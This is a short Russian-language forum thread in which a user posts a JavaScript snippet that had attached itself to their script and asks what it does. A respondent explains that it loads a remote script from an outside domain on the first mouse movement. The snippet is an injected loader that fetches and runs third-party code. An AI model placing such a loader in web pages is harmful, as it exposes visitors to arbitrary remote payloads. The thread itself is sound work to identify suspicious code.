Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 07.02.2012, 16:30
Новичок на форуме
Отправить личное сообщение для Serg_G Посмотреть профиль Найти все сообщения от Serg_G
 
Регистрация: 07.02.2012
Сообщений: 2

Помогите определить назначение скрипта.
Вообщем кусок кода каким-то образом прилепился к другому полезному скрипту. Незнаю как.

Вот сам кусок этого кода.

(function() {
    var url = 'http://driedacoustic.groks-this.info/g/';

    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }

    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function() {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();



Что примерно делает эта часть кода?
Спасибо.

Последний раз редактировалось Octane, 07.02.2012 в 16:49. Причина: javascript.ru/formatting
Ответить с цитированием
  #2 (permalink)  
Старый 07.02.2012, 16:52
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

Как только происходит движение мыши в пределах страницы, подгружается какой-то скрипт. Адрес скрипта http://driedacoustic.groks-this.info/g/3080794569410963.js, цифры всегда разные.
Ответить с цитированием
  #3 (permalink)  
Старый 07.02.2012, 16:59
Новичок на форуме
Отправить личное сообщение для Serg_G Посмотреть профиль Найти все сообщения от Serg_G
 
Регистрация: 07.02.2012
Сообщений: 2

Большое спасибо.
А реально ли выцепить скрипт который подгружается, что бы выяснить что он делает в свою очередь?
Ответить с цитированием
  #4 (permalink)  
Старый 07.02.2012, 17:39
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

Не знаю, домен сейчас не доступен
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите определить формат времени HackerSniper Общие вопросы Javascript 3 20.10.2011 18:25
Пожалуйста, помогите с созданием скрипта! Елизавета Общие вопросы Javascript 10 08.06.2010 13:20
Помогите чайнику. Два одинаковых скрипта на странице. VASH132 Общие вопросы Javascript 6 28.01.2010 15:42
Помогите убрать копирайт с скрипта Kirilllll Ваши сайты и скрипты 7 09.10.2009 22:51
Помогите разобраться с логикой поведения скрипта MarkupDeveloper jQuery 3 21.06.2008 18:04